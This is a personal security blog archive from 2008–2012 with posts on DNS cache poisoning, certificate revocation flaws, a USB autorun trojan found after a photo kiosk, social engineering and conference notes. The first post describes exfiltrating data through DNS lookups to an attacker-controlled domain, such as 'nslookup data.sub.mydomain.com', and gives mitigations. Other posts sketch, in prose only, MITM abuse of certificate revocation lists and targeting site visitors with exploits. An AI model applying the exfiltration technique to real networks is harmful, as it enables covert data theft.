Morgan's Security Blog

Easy data exfiltration

2012-01-19T17:55:00.000+11:00

I had this thought last night as I was falling to sleep, and I realise it has probably already been talked about but I will explain how easy it is to do and how hard it is for existing detections to detect.
So my idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, you logged on as a local user through some exploit via boot disk or what not. You probably don't have internet access and you can't install a tunnelling tool, you don't want to set off the local HIDS of the machine by plugging in an unknown USB stick, so what do you do?
Well if you already have a DNS server running on a server you control, pre-setup for something like DNS tunnelling, or just legitimately resolving your own domains. Now your existing DNS server you need to turn on verbose logging for one of your subdomains, this is pretty easy to do on BIND or even in Windows's DNS server. Then simply encode from the local machine anyway you want, or if you can't encode it don't and just do an nslookup data.sub.mydomain.com, bear in mind the whole lookup can't be longer than 255 characters and the subdomain can be 63 characters tops, if you need to use some special characters then you will need to either encode in base32 or use some system in your head.

Mitigation: Do your client machines really need to resolve every site, surely they are going through a proxy or application aware firewall that can do the DNS lookups for them. The issue of course with this is most networks now use DNS to resolve internal services, and usually the DNS servers that service these requests are allowed to go to the internet in some way, and the proxies or firewalls refer back to these internal DNS servers as they would also point to resources the proxies need like authentication. The only suggestion then is to more finely split your DNS server infrastructure up. Specific internal DNS servers that are allowed to do lookups to both the internal DNS servers and the wider internet, but the only device internally that is allowed to these is the proxy server. Of course depending on the way your proxy server works it may not wait for the client to be authenticated before it does a lookup so the lookups could simply be proxied through the compromised machines web browser that is connected to the proxy.

Adobe and Fileopen pain

2011-02-21T22:34:00.000+11:00

Not really a 100% IT security post. But Fiona had an issue with getting a particular sites print functionality to work on her Ubuntu laptop. It seemed to "print" by opening a PDF, that was secured in some fashion. Having a look at the error led no where, something like "could not open plugin". Having a look at source etc didn't give any help, there was no help page that Fiona could find on the site.
I resorted to trying to open the files with Windows, bam it tried to install a plugin called Openfile, I found there was a Linux version of OpenFile here.
Excellent, a Linux version I downloaded it and ran the installer shell script, it error'ed out as I had Adobe9.3 installed, the latest. Looking in the script it had a check for the version of Adobe installed, it only checks for 7 or 8, else fail. Googling led me to a recipe sites support page with posts from back in 2008 with someone complaining that Adobe 9 wasn't supported, the recipe site had started to ditch FileOpen as the support request hadn't been fixed to support Adobe9. The main reason I am posting this is to help others in this predicament.
It was important I get the site to work, so I assured Fiona that windows was not the answer.
I ran the following (as I had installed it manually from a deb from adobe just in case it was an old version issue) sudo sh /opt/Adobe/Reader9/bin/UNINSTALL
Then managed to download an older version from here http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb and installed it, then ran the OpenFile shell installer and all was good, site worked all was happy with the world.
Just posting this for anyone else who has the issue.

Definately not outage Virgins

2010-09-26T23:30:00.001+10:00

So in case you haven't heard an international budget airline here in Australia has had a major computer issue, see here.
By the sounds of it their outsourced service provider doesn't have redundant kit, as they couldn't simply fail-over. But it gets worse currently going to https://book.virginblue.com.au/FlightInfo.aspx or https://book.virginblue.com.au leaks a lot of information, and leaks a nice juicy standard ASP.Net error page, of the type that the recently discussed Asp.Net oracle padding attack can take great use of, see here.
Ouch and double ouch. Oh and we hear this is not the first outage they have had in as many months...

passive recon on valued targets

2010-07-25T20:33:00.000+10:00

So there was a bit of a flash in the pan recently, when my post on a simple autorun virus exploded after I notified Patrick Gray of the Risky business podcast and he blogged it, and then zdnet, Lifehacker and Slashdot (queue O'Fortuna) picked it up. I am now even listening to the risky business podcast where I get a mention.
Needless to say I got a lot of traffic (not a tonne, maybe the Slashdot effect is waning). A majority came from home users, interestingly a few had Firefox with java turned off, these showed up in extremetracker (used them for a while, and they still have some value obviously). Those that didn't showed up in Google analytics.
I am a big fan of no-script, so it seems I am not alone.
Before I get on to my main point I feel I need to argue some points.
First Lifehacker seemed to allude to the USB key either being infected from my home system or in some other way. This is simply untrue. This is a windows virus, thus a windows binary, simply won't run on Linux so no way to get infected there, and that was the last system it was plugged into and everything on it deleted to make way for the small collection of photos. The other point is the investigation I did, our receipt showed a time of 2:35pm (already gave the Job number to BigW for their investigation team), the virus folders creation time (and the files inside) was 2:24pm on the same day as the receipt.
On to the main point.
Of the total ~2000 hits, there were some interesting and funny hits. There was the obligatory hits from Woolworths, BigW’s parent company, then funny from Coles (there biggest competitor) and Kodak (the kiosks are Fujifilm). Then came the interesting, obviously driven from the Slashdot post. Some hits from government organisations, some from big military complexes and security agencies the world over.
The point of this post is to point out what kind of information these different public and private companies exposed. Obviously first off the bat, and something I thought of but my Boss put eloquently into words “Why do so many of these organisations have such telling reverse DNS records or ip block records”, why indeed. I am not going to name names, but using the ones I have already named. Woolworths, their block was registered to Woolworths Limited.
The next point that concerns me more is the other data that leaked out, I have their external IP, ok that’s not really much, but their browser version (a lot of IE6 out there people have you learned nothing from the Google breach), their connection speed, OS, etc etc. This could lead to someone simply writing a decent tech article, getting Slashdotted, then getting a list of targets stream in, do a bit of Google digging find an employee in said companies email address/linked-in/Facebook and send them an email to a follow up post with a nice 0-day with remote code to install your custom malware, some good reconnaissance on the most valuable (techies) targets. Usually you can assume the techies are running the latest software in the company, so if you see ie6 you have hit pay dirt, if you see Mozilla 1.0 woo. You can even look for outdated OSes with un-patched vulnerabilities; there were a couple Windows98, Windows2000. Oh and to that 0S2/warp4 user that hit the site (if it wasn’t forged) both my apologies and respect...
So from this I would think maybe everyone should change their proxies to use a different IP out of their block that is not registered to their company name, no reverse DNS, and you know update your browser and OS once in a while, or change what your browser reports itself as to a different browser.

Big Wirus

2010-07-04T18:43:00.003+10:00

Gather round everyone for a tale of woe.
So I loaned one of my many USB keys to Fiona to backup some of our photos to print at a BigW, Mt Gravatt to be precise. I had cleared everything off and handed it over to her to copy over the photos. We tried it in a local BigW (Mt Ommaney) on Saturday but couldn't find a station that worked properly, we managed to get a few photos printed, but Fiona kept the key to see if she could get them printed elsewhere.
Off she trotted to Mt Gravatt BigW on Monday after she dropped the kids at kindy, she printed out the photos and thought nothing of it. Wednesday night I decided I should move my files back, I plugged the USB key in and noticed among the photos a hiden autorun.inf... Not usual for me to have leave that there, a quick read of it in text editor let me see it was trying to run RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\driver.exe scanning the file with clamwin let me know it was Trojan.Poison-36 (it goes by other names, trojan.killav is Symantecs name) a nasty little phone home trojan that was only discovered recently (9/06/10), that uses the usual trick of infecting attached drives with the autorun.inf trick. It also then goes on to try and kill av programs and then once that is done download other malware, see here
I was safe due to my self inflicted draconian software restriction policy, and Fiona who had plugged it in to her laptop was safe due to it being an exe and her running Linux.
So I notified BigW back on the 30th, I think for something so little, I have given them reasonable disclosure. It is something they could have designed against, by using a software restriction policy, or simply making the USB devices read only via policy, or hey you know Antivirus that at least occasionally gets updated...
I was and still am tempted to put my own little exe and autorun on a key to see if the kiosks are still vulnerable, but Fiona has advised against it, my little voice of reason.
My problem with this issue, is that there seems to be little design that has gone into a system that thousands of people probably use a week, and little concern for users of these systems, how many people are going to get home and infect their systems, how many are going to not realise it was due to the dodgy kiosk they used and then blame the internert, Microsoft, or their kids. I am not a big fan of misplaced blame.

Not really much news here, viruses are a part of life. But with most modern USB keys no longer having the nice little feature of a read only switch, there is little you can do to protect yourself. You could try having an autorun.inf on your key that is marked read only, that may work unless the virus knows how to overwrite it.

security

2010-04-27T18:29:00.002+10:00

I am the first to admit I am a sad geek. When I saw this the other day it made me laugh, possibly a little too much; http://abstrusegoose.com/262
What follows is a computer security debate on a fictional character in a fictional universe, I apologise in advance.
Now I have to debate this. I always thought of R2D2 as the ultimate in automated hacking. AI that is constantly writing vulnerabilities, heck he probably has a virtual Imperial System running in his hardware to throw test code at. That and he had physical access to a data port, ala USB, so he may have known some nice little direct memory injections or even a kind of side channel attack if the system was one big computer (which it seems to be) he could have been detecting key inputs from other terminals via power fluctuations in the data port.
If it was a network, he could have known some protocol vulnerability or remote code exec that the good old pompous "no one will be able to get to that vulnerable access port on our space station" Empire would not bother patching, can you imagine the amount of patching the empire would have to do though.

If we take the monolithic single computer per vessel approach (which leaves no room for redundancy) you have at its peak 25000 Star Destroyers, 12 Super star destroyers and around 3 million other vessels (tie fighters, Corvettes, Gunships, Transports, and the Death Star). So let’s say 3 million huge computers, that probably can't be patched while in service, so will only be patched when in for maintenance at a dock, leaving lots of time for Vulnerabilities to be discovered, and vulnerabilities on a non-segregated duty single monolithic computer would be awesome, initiate self destruct anyone?

If we take the multi-computer networked approach (which seems more likely with what we know that the hyper drive computer needed time to spin up and that droids seem independent). A Star Destroyer had about 5000 members in its crew, and the Super Star Destroyer and Death Star about 300,000 crew, we will say the smaller craft had an average of 10 crew (tie fighters, Corvettes, Gunships, and Transports). So that means a total number of service men and women of about 160million, they probably work 3 8 hour shifts a day plus some to cover weekends, so maybe a quarter of those have actual workstations, but there would be servers and central computers, so say 80million computers, plus about 10million network devices near on impossible to have 100% patch rollout on a network of that size, give someone physical access to that network and they will get in somewhere, especially if that someone is a precocious little blue and white droid.

Sources; http://starwars.wikia.com

Altassian and Apache are related?

2010-04-15T22:31:00.000+10:00

A very good write up of the impressive attack that was carried out on these two groups; http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm
It is good that this underlines the real power of an XSS, I have heard people dismiss XSS and this will be good to pull out at times like that. But it wasn't just XSS it was a co-ordinated multi-pronged attack. Work of real pro's. Just goes to show if someone wants in badly enough they will get in.
I know some of the people at Altassian and I would say that unfortunately they got attacked by a better opponent. No one is infallible. It is good though how Altassian handled it then how Apache handled the resultant attack. I would say Altassian was the target because of the donation to Apache, it made them a target.

Oh yeah and I have said it before and I will say it again, I hate URL shortening services they should all die in a fire, if twitter wants to stick to the 140 characters (which is a good thing) move to putting URL's in the page as a simple html link that goes at the bottom ala the way Facebook does it.

A bleak but bright future

2010-02-09T18:38:00.011+11:00

So listening to Dan Gear on the Risky Business podcast talk about the possible future of computing today while flicking through my RSS feed. I came to a realisation.
The future of computing is going to be bleak. But maybe good for our security.
Dan was talking about the new iPad and existing single purpose devices as being the new wave of computers. Think about it a device that is so locked down and vendor locked in that it is inherently secure due to that. Devices that are single purpose, they don't and can't do everything your previous computer could, think about it a light and switch doesn't require updates or security patches. Its purpose is singular, provide light or not.
These computers would do this as well, provide a game, information, or what have you. We are already here to some extent, single purpose computers plugged into or inside televisions, locked down to the way the vendor wants, not necessarily locked down enough but regardless. They still have bugs, ways to circumvent the original intended operation, but generally speaking these bugs require the inclined to be in front of the device, not miles away in their parents basement.
Then while listening to this and pondering I read another article about "Cloud computing".
So the future will be these big provided clouds, some to play games in, some for businesses, others for research and development. Single purpose environments abstracted away from even the technical users. Who will use a single purpose thin client to access these clouds.
So on one front it sounds good, security and technicalities are abstracted away to an extent. On another front it means tinkering will be harder, with everything, technical people will actually be less technical than they are now, it will be a dumbing down all around.
I have played with Amazon's elastic compute cloud, Google app engine, and run a personal virtual server on my laptop and media centre as well as running several different ones in production so I can see the advantage for the moment, but they can pry my multi-purpose machines from cold dead hands when the time comes.

Linux secure?

2009-12-14T18:32:00.001+11:00

Oh my, read this; http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
Of course this is just the beginning, I saw this in the early days of windows, popularity means people want flashy yet lame screensavers so they go a hunting, see a banner ad that is flashing epileptically at the user that tells them their search is over, they click it and install a new theme for their cursor (I hate these), a day of the month screen saver, or a fancy toolbar which will let you know who is browsing your MyFaceTwitLinked page at any given time, and also automatically installs thousands of other applications you may like, hiding in these are some nice little bots. Of course on install it asks them for their password as it has to make system changes, it then puts a helper in roots cron and makes a new init.d daemon to keep it memory resident and its privledges elevated, heck maybe it even recompiles some binary that is used frequently with elevated privledges that checks all that other stuff is still good to go, something like the logserver or init
Then we Linux will have reached the popularity of windows, the weakest link will again be the user.
So in my humourous little story above I am trying to point out just cause it is safe now won't mean it will be forever. Windows is less and less about Worms that automatically get in without user intervention. Conficker was the last big one and MS had a patch out before it hit, so it was only slow patching that really let it spread. The rest of the viruses that are seen are delivered along with innocuous looking software, or at worst a drive by download that means a page is running something in the background that takes advantage of a hole in internet explorer to install something, these drive by downloads won't happen. But have a look at the top 15 http://www.net-security.org/secworld.php?id=8597 most common attacks and you will see Linux and Macs are susceptable to the lot, through misconfiguration or user error.
Don't get me wrong I am a big Linux fan-boi. If I had it my way Windows would be the struggling niche, Linux would have 96% market share, BSD 2% and macs wouldn't exist :P I think the ideal behind linux is very admirrable and scientific. Linux builds on what has come before it (usually) and because what has come before is open and readable this is fairly easy. "If I have seen further, it is by standing on the shoulders of giants." Sir Isaac Newton. To not build on what has come before is to repeat your predecessors mistakes.
There will always be flaws, till we write code that can write its own code it may eventually create something almost flawless, or one of its children will.
I think Linux allows for greater security, but also greater insecurity. Security is not were open sources power lies, it is its flexability.

Rickrolling has gone viral again

2009-11-17T21:50:00.004+11:00

Now this story interests me on so many levels.
It has put Wollongong on the map again people. I'll admit I was raised in the Gong, so it is good to see someone even making notoriety that is from Wollongong. The last renowned intelligent export we had was Evelyn Owen or Sir Lawrence Hargrave (1939 and 1915 respectively) so it has been some time between.
I also dislike apple, there practices annoy me; there practice of dumbing down everything even the extremely technical is the same as dropping superfluous words from the English language to make it easier for speakers, we only need one word for cold right? They also stand on the shoulders of giants, yet give little recognition to those. Yes they made Unix "usable" (so did Linux without the pompousness), but try and find their references of gratitude to all their stolen code, or stolen ideas, nope. Apple have fallen down in the security world repeatedly, and this is a glaring example who sets the same password on every device when you can assume with pretty high certainty that people are going to attack it and find out your password, hence the unlocking.
The other reasons this is interesting is it is a virus that Rickrolls people, hilarious. Rickrolling is something I have done, and had done to me a fair few times, it almost always makes me smile. The other humorous point of this is the author is Ashley Towns, so the meme of Rick Astley is almost made for him.
Well if you own an iphone (hisss) then you can secure it against this virus here(a simple passwd to fix it), bear in mind that this virus will probably hang around for a few years like code red and slammer, funny stuff.

Revocation, just rolls off the tounge

2009-09-02T10:39:00.005+10:00

First an overview, SSL is pretty much the only protection available when banking, shopping etc. It means the user has to look for the https:// up the top rather than the http:// to ensure the session from their browser to the websites server is encrypted in transit (this isn't perfect people can fake some certificates, and security researchers are trying to find its holes all the time). Don't trust the lock or the little green bar that EV certs give you as these can be faked several ways, generally though the https and certificate information can be trusted. Also look at an extension for FireFox called SSL blacklist for FireFox that will notify you if a certificate is bad due to one of many reasons.
One of the interesting things about certificates is of course they have to be able to be revoked, when for some reason they become compromised or some such other reason.
CRL or certificate revocation lists as some are probably aware are basically a list stored on the company that provided the certificates website, basically a list of all the certs that have been revoked. Excellent idea, but look at most certificates details and CRL is hosted on a good ole plain http site eg; http://crl.thawte.com/ThawteSGCCA.crl
YAY, so if you want just own a few crl via DNS poisoning or man in the middle (MITM) a user (can we say web cafe) and serve up a fake crafted CRL to revoke heaps of certificates or just remove your revoked cert for their bank etc. Of course there are a lot of variables here, you need to know the CRL that is going to be requested though if you have MITM'd them you can just serve all of them up, they are usually signed, but not always, you also need to know sites they are going to go to, but you can dynamically do this as well.
Their digital signing doesn't look that good from what I have seen from reading the crl's either, but they are supposed to sign it with their SSL certificate available from their site via a link, so no trust their just sign it with your own cert and serve that up at their site as you are already in the middle.
But the nice thing as far as a denial goes is that most operating systems cache this info (for 24 hours usually), and the Certificate hierarchy is good just blacklist the vendors root certificate.
To do any real damage you still need to get a certificate registered that has been falsely registered, or do a bit of social engineering, blacklist all certs and pop up a page saying the user needs to update their certificates, redirect them to a legit looking site that asks them to install a certificate package full of your own generated root certificates, all SSL sites from then on are readable as you re-sign them with your key on the way through.
Of course SSL isn't a fix for the revocation lists as no one will see that it requests the list from https instead of http, I have even seen some installs of Internet Explorer that have certificate revocation checking turned off, I am not sure if this is default, but bad none-the-less.

Well I hope this long winded odd rant is at least made some people think. It is a very odd setup and I am surprised all CRL's don't require possibly multiple signing by at least two vendors kind of like nuclear launch codes.

Vmware issues

2009-06-24T19:36:00.002+10:00

Not so much a dedicated security issue (though Availability is in the CIA triangle that should be drummed into everyone by now), but something I thought I would blog about as I found it no where else.
I was having an interesting issue with a guest on one of the ESX clusters I manage, looking at the ESX host, none of its other guests were having issues. The guest in questions came up as disconnected, not powered on. But I could RDP to it.
I logged into the host and checked esxtop and noticed the Guest was in the list.
Checking the tasks of the Guest in the Vmware client I noticed its VCB backup last night died, and that the error I was getting on the guest was Unable to communicate with host, since it is disconnected, I got this same message when trying to power on the guest.I quickly checked the vmware.log and dmesg on the ESX host that was hosting the guest, nothing obvious, googling around gave me no answers. It was then I noticed the last entry in the vmware.log was early this morning, to do with CD rom errors. I thought it could be a simle management disconnect, so I ran

/etc/init.d/mgmt-vmware restart
The whole ESX server disconnected from the VMware client as you expect, then it came backup, the problem host came backup too, no downtime, no mess. Ran a quick manual backup and all done.

Ruxcon belated Day2

2009-01-02T18:15:00.002+11:00

So this is really a belated day2, been fairly busy at work. We had an embargo for changes over December, but that didn't mean we didn't do work, we had less people on so we did more.
I am going to put a bit more in that the initial recap I did of day 1, first the recap of Day2.
Day 2 was well and truly on par with Day 1, the Ruxcon guys put on an awesome con, and I had a great time.
To recap on day two I went first to an excellent talk by Ben Mosse entitled Browser Rider, next on to a promising tool that was presented I thought somewhat appethetically called Intelligent Webfuzzing by Neil and Bern Archibald. Then onto the BBQ lunch where I had a chat with one of my security mentors the venerable Martin Visser (he knows his wireshark fu).
Then after lunch I went to one of the highlight talks of the con, Netscreen of the Dead by Graeme Neilson (that I recently heard talked about on the pauldotcom security weekly podcast). Then onto the smaller room2 for Googless by Christian Heinrich a fairly good talk but I think aimed more at those not up on their google fu and scripting.
Then finally onto a very interesting talk by Adam Daniel called Pimpin: Forensic Style.

NOTE the talks slides (not videos yet) are available here

I was going to talk about the day in more depth, but that has been whats has delayed this. I will post my notes one day.

Ruxcon 1st day

2008-11-30T00:02:00.003+11:00

So I am back from the very awesome Ruxcon and its after party. It felt good to be among my own people, I saw at least two other geeks wearing a "There's no place like 127.0.0.1" T-shirt, and several with other witty, geeky and or security related repartee.
I saw some awesome talks of which I will go into more detail later. I also met the venerable Patrick Gray of the Risky business podcast and Adam Boileau one of his regular knowledgeable guests.
Some standout talks so far have been Enterprise Security, Softer than the foam on my Frappuccino by the LUMC Crew and Ghost Recon: Subverting Local Networks by Berne Campbell, I recommend you download them with slides when/if they become available.
Well peace out all.

Welcome

2008-11-13T20:35:00.002+11:00

Welcome everyone to my Security blog, I ~~will~~ have migrated over previous posts from http://www.morganstorey.com ~~as we go~~.
All of the ones from the previous few months have been coppied across, any beyond that will have been indexed by google(and was before I used tags so it will take to long).
I have added RSS and ATOM feeds to both blogs, please subscribe over on the left if it interests you.

Makes the blood boil.

2008-11-13T17:08:00.001+11:00

So if I haven't already ranted at you in some way shape or form, you may not know of the Australian government's short-sighted plan to add us to the ranks of oppressive regimes such as Iran and China. In fact that is unfair as Iran's proxy is considered to be looser than the one Senator Conroy wants to implement.
The long and short of it is that Conroy wants to restrict what pages are available to Australian internet users. Sure it is for the kids (won't someone think of the children)… But as I have said to people I would rather my children see the entirety of the disgusting underbelly of the internet than have one single thought provoking site blocked. Not to mention the degradation to performance in a country that is already considered one of the worst in the world for connectivity. In Sweden groups appealed to the government saying 100mbps is welfare. Here most people are still on 1/200th that speed, and with Conroys plan that 1/200th would lose anywhere from 2-80% of its speed, welcome back to dial-up days.
There are a plethora of sites that are likely to be blocked because they aren't "kid" friendly. June next year you will probably see the below when going to user content generated sites such as Youtube and Facebook:

Here is a news flash senator; kids get hold of porn even if you restrict it, even in the pre-internet days. So what your doing will only have negative effects. Parents with no IT knowledge will have a false sense of security and not monitor their kids browsing habits, these same kids will find ways round your precious filter, and these methods that will become popular may even make it harder for parents and educators to monitor their usage.
The filter will slow down internet access and again the people with little IT knowledge will have no idea how to get around it for legitimate sites that are blocked. Then there is the cost which you are expecting ISP's to mostly cover off their own bat, which will increase internet costs in a country that already pays too much for too little.
Way to go Senator you deserve your award:

I feel lost; I don't know what to do. I feel as though someone has decided freedom of information is a bad idea, so let's mandate it. Then what do you do. Once the book burning starts it is hard to stop.
I have emailed the Senator and his opponents, and the letters are in the mail.
I urge everyone to look at the following sites and take action: http://nocleanfeed.com your silence is all they need to pass this and then you are no better than them.
Peace out all, except Conroy and his supporters who can just unplug their computers, televisions, and burn their books for the same effect they are trying to mandate.

PS: I am starting up a dedicated security Blog as I want to separate the two, this of course crosses both blogs so expect to see it on both. My new Security blog is linked on the left or here: http://security.morganstorey.com

Social Engineering

2008-10-08T20:51:00.000+11:00

I think possibly the equal first security threat facing all business today is that of Social engineering. I say equal first, because a lot of insider threats would probably fall under this banner. The employee, lets say his name is John calls up the helpdesk, he tells them his name is Sam, and that he has forgotten his password. You of course see where I am going with this, the helpdesk happily resets Sam's password, John knows Sam is out to a long lunch and has access to files he doesn't. He logs in as Sam, gets the files he needs and then logs out, maybe even leaving a post-it on Sams screen saying the helpdesk had to reset his password to blah, so the helpdesk doesn't get another call and get suspicious.
John know has all the files on his cheap USB disk, or in hard copy and does with them whatever it is nefarious people do with data to make a buck.
I have seen mitigation techniques for the one I mentioned above, all users have a password reset word, something they wouldn't have as a password and stored in plain-text for the helpdesk to see. This will mitigate it, unless John says he forgot it and to send someone down, the helpdesk guy may not know John or Sam, and as long as John is in Sam's office still acting like he owns the place he will probably get away with it.
Social Engineering is scary for another reason in that even non-technical users can do it. I remember I had a client once who had a relitively new employee call up asking for some permissions to files he needed for work. I knew his role was to do with those files and I knew his voice over the phone (as funnily enough he had moved from one client to another). Still I decided to call his manager to get the ok. She didn't give it, and was a bit distrubed that he had asked for the access. Horray one for the good guys.
Have a look here at how easily some guys doing a sprite commercial pulled off some non-harmful social engineering.
Here is a very thourough article on the subject.
And here is my first shirt design on cafepress, totally on topic.
Really though combine some social engineering with technical knowledge the smarts to think of the good-guys mitigation techniques and the connections to make money off your exploits and you have a major foe to be reaconed with.
I think in future we will need to audit our people as much as we do our security systems. Having someone who won't suffer the repricussions of the law come in randomly and do spot checks would keep people on their toes, but it also comes down to having the personal touch, knowing people by name, by their voice, by their face. Maybe the solution is smaller decentralised IT departments, say one for each department and at least one at each site, this lessens the body of knowledge but increases the likelyhood of the staff member knowing the other. I don't know, someone will come up with a solution eventually.

Lets get Physical

2008-09-29T19:07:00.000+10:00

On the way back from a very interesting an informative Microsoft Security Summit the other day and I noticed something that caught my eye.
Too many people concentrate on the hardware and software, and leave gaps. Gaps in the physical security, or gaps in the training of staff.
This photo shows off both.

Seems a cleaner at the train station near me had left the door open to the area that she kept her cleaning supplies, the same area that had a rack with server, fibre switch, ethernet switch, patchpanel and other miscelania. Whats that you spy, yep the rack door is unlocked too. Click click and a bad guy is on the network, just plug in a wireless router and see what traffic you can capture, doesn't matter if this network is firewalled the best in the world, or even airgapped, game over.
Back on the security conference I attended it was very interesting, it was all covered under an NDA, except the bit at the end which I already talked about. I am starting a security group in Sydney, sponsored by Microsoft. So Jeff Alexander let everyone know, I had a heap of business cards handed over for people that wanted to be kept in the loop, it is very exciting that we have this much interest already.
Well Peace out all, and please lock your racks and don't put them in a room with a sink for the cleaner to use.

Sydney IT Security Group

2008-09-15T18:03:00.001+10:00

So I had a chat with Jeff about starting up a Security group in Sydney similar to counterparts in Canberra,Melbourne, and Brisbane.
It is really a great opportunity and I have been looking for a security group in Sydney for years now, making do with going to security topics at other groups. I don't think it will detract from these other groups just expand on the security theme, going places other groups may not want to go as they are too focussed.
I'd like to get some comments here on what people would like to see and what night etc, but people rarely comment on my blog. So I will setup a site for the group shortly and we can duke it out there.
Peace out all.

Pretty lights

2008-08-27T18:00:00.000+10:00

More on DNS I know. May as well be another person beating a dead horse. But I give you pretty: http://www.doxpara.com/?p=1206
It is a video of the patched and not patched world wide. It intrigues me that there is a blinking light on the map of Australia about 3 hours north of Adelaide, I doubt it is Alice Springs, to south, maybe Coober Peadie if my geography serves.
Onto some more supposition by me (mainly in reply to Dan [the guy who discovered the Researched the DNS flaw] here);
I agree with what has been said, that we need more security on an inherintly in-secure network. But some (percieved) anonymity and some plain text is good, and what the internet is all about.
Could you imagine every site moving to https, for starters what is the point, who needs to read my blog through an encrypted channel? Really why, I don't really have any direct post functionality, and only a handful of readers, it is not like I am directing them to blindly do anything either.
Onto DNS, I was thinking the other day of another way to fix the issue. Deploy a port knocking technique on the reply based on the query, so that ports would have to be knocked in the correct order on the DNS server pre accepting back the lookup. Similar to the way a person gets into a safe, knowing the numbers isn't good enough you need to know the sequence. This would stop NAT being an issue as the DNS server can make the request out on all ports getting an auto map back on these ports. And would be more secure as the attacker would have to guess the right ports to knock on the way back, or read the request and then generate the reply and reply back, but if they can do that they are already in the middle and its game is over.
What do you think?
Peace out all, especially Dan, good job.

DNS woes continue... sorta

2008-08-14T18:54:00.000+10:00

So as I said, and the original discoverer Dan said, it was just a patch. Not a fix, not a be-all and end all solution. A temporary patch. We already know some nat devices break the patch's fix. But from the looks here and here it can be broken. The first link even details how, but there is a caveat. It is not easy, and a lot of bandwidth with low latency is required.
The first article explains how they did it over Gige in 10 hours. So most DNS servers that are doing resolves for clients, are probably not even on 20mbs of bandwidth, and latency 10+ times that of ethernet, not including the clients themselves causing some load. So you could say it would take 10+ times longer to do this over the internet, so 100hours. Someone will hopefully notice at around hour 20… But it isn't that simple, what if some baddie hits a server with a mere 100 clients... (Most botnets are 10 times this size). Chaos again. We need a better fix. I mentioned before some kind of signed DNS, I am the first to admit I have gaps in my knowledge as I have never heard of DNSSEC, now I that have listened to the Blackhat talk I have heard about it. I had a quick look at wikipedia and the official site and it is interesting. Of course windows servers only support it as a secondary, also the glaring-hole of non NSEC3 servers allowing enumeration of sites is just plain silly. Seriously just hash The users request domain "Not Found" and add it to the RFC, done.
I think it should include the option for encrypting replies, may as well, could be useful for higher secure organisations.
This is a very real and very now threat, there are at least two pieces of software out there to attack it, one being the very good, but very newbie friendly metasploit.
Well I am pretty much just re-iterating and expanding on my comments on darknet but there you go.

DNS Vulnerability...again

2008-07-25T19:48:00.000+10:00

There has been some speculation and even backlash on the internet about the recent DNS vulnerability, I posted about it here. Interestingly some people are saying that the vulnerability should have been disclosed when discovered.
This is plain silly. To put it in simple terms with a car analogy (I love car analogies); if a saftey tester discovers that every single Toyota Corolla on the market (the number one selling car, 35million world wide) bursts into flames (props to fight club, note: Corollas don't afaik) if you crash at exactly 35 kilometers per hour. If he just posts this on his blog a few things will happen; everyone will know in about two seconds. The next day 35million Corolla owners will demand a refund, either destroying or severly damaging Toyota and its employees, and hooligans will wander around car parks with sledghammers hoping to hit one with the lucky 35kph speed. Basically what I am saying in a rather confused and overly long analogy is if this had been disclosed pre-vendor patch-release their would have been lost confidence in the whole internet, there would be lost jobs and money from the lost
confidence alone. Then the real fun would begin, prior to the patch being released someone would write a script to take advantage of the vulnerability, this script would then be morphed into several gui tools, and every script kiddie and his bot army would take down sites worldwide for fun and profit.
I am not saying it would have been an internet dooms-day, it could have, but the internet is pretty robust. But it would have been very damaging had the vendor patch not been released, there would have been loss of income and loss of jobs.
I agree with the way it was done, but maybe it could have been done a little sooner if you do a google search DNS cache poisoning is not new in the slightest, have a look at the wiki article. Birthday attacks are a common similar variant, I have even been involved with a cache poisoning issue a couple of times, first back in 2003. Both times I couldn't capture the culprit, there was just too many packets to wade through, but the problems were solved.
I do agree with what I have now read, maybe we need to move across to some kind of signed DNS, either SSL Dns or some kind of signed cert, like gpg and its signed keys.
We could setup the root servers all with a cert or signed key that all DNS servers are set to trust, just roll it into an update or new DNS installs then slowly cut over, then if you want to say use your ISP's servers as forwarders you could simply implictly trust the key or they could buy a signed cert (I can hear Verisign/Thawte licking there lips from here).
Supposedly due to some disclosure there maybe a script kiddie tool out soon to exploit this vulnerability, and with most NAT devices (see routers) turning patched servers into vulnerable ones and some of these routers not being patched/patchable it is only a matter of time. So everyone PATCH your servers please.

Here be dragons

2008-07-21T18:29:00.001+10:00

If you haven't seen this yet have a look. Yes the brilliant webcomic xkcd sometime ago did a Map of the internet, I used to have this posted on my wall at work so the newer employees could come have a look when they were visiting to ask a question, it really shows how immense it all is.
But then while looking at one of my bookmarks on network security using darknets for a post on an internet forum I found this: a map of malisciousness. Awesome. It really is interesting to see the concentrations of either compromised machines or general evil-doers in the world. The thing that gets me and got me when I first looked at it was why is the 10.0.0.0 range have so many hits, its a private range, then I looked closer. Why are a few of the "bogan" address ranges getting hits. The only thing I can think is IP spoofing, and if so who would spoof a 10 address. Why not spoof 1.3.3.7 (fun) or something else, everyone knows 10 is internal... anyway post your thoughts.
Oh yeah we haven't quite won the DNS thing yet either. The multi-vendor patch was just that a patch, there are still inherent flaws in the system. Like the new one disclosed with DNS that passes through NAT (see most DNS servers as NAT means some decent IP sharing) it is annoying but it is a fight we have to keep on. See here for the article. It is basically NAT routers being lazy and not letting the port be the random one that the DNS server wants it to be. This randomness doesn't make DNS invulnerable to the poisoning attack I mentioned earlier, it just makes it much, much harder. So to have some routers (people like netgear don't release patches after it is 5+ years old) destory the hard work must be really annoying.

DNS vulnerabilites and Sydney IT Security Group.

2008-07-14T19:24:00.001+10:00

As you may or may not have heard there was a big update released for basically the whole internet. See here and here for a test of your own dns.
Basically it boils down to a bad guy being able to put incorrect entries into your ISP or works DNS cache that would point you to the wrong site. So instead of going to google.com it could take you to a hackers version, or whatever. This would also effect email.
Now this kind of thing does happen occasionally, but this was seen as such a big issue (it could basically destroy the internet if unchecked and unpatched), that CERT who handles these issues let all the Vendors and developers know. Giving them time to write a patch for release on the same day. Very, very impressive.
Not only Microsoft but Unix, Linux, BSD , Cisco, Checkpoint, all of them released a patch for their varied DNS implementations. Yahoo who uses an older *nix implementation of DNS, Bind8 managed to simply comit to abandoning it in favour of the newer patched Bind9.
